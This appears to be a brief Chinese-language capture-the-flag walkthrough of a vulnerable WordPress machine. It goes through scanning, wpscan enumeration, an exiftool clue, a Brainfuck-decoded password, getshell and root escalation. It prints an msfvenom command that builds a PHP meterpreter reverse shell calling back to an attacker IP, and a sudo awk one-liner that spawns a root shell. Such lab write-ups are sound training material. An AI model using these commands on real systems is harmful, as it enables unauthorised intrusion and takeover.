文章目录
信息收集
-
ip
-
端口
-
目录扫描
发现存在 wordpress
-
使用 wpscan
发现存在 web 用户
没有发现插件
-
在 /img 目录下存在 flaghost.png
-
用exiftool查看了一下图片信息
exiftool flaghost.png
-
可能是 web 用户的密码,尝试后发现是路径信息,访问 /passw@45 出现 flag2.txt , 内容如下
搜索得知这是 Brainfuck 编码
解密后得到
web:Hacker@4514
-
此时可以登录到 wordpress 后台,发现 web 用户是 Administrator 权限
Getshell
这里可以使用两种方法getshell
方法一
修改模板反弹shell
使用MSF生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.154.128 lport=4444 > shell.php
方法二
命令执行
通过修改前端绕过长度限制
提权
尝试 web 账号密码登录
在家目录得到flag3
发现可以以 root 用户执行 awk 命令
执行命令
sudo awk 'BEGIN {system("/bin/sh")}'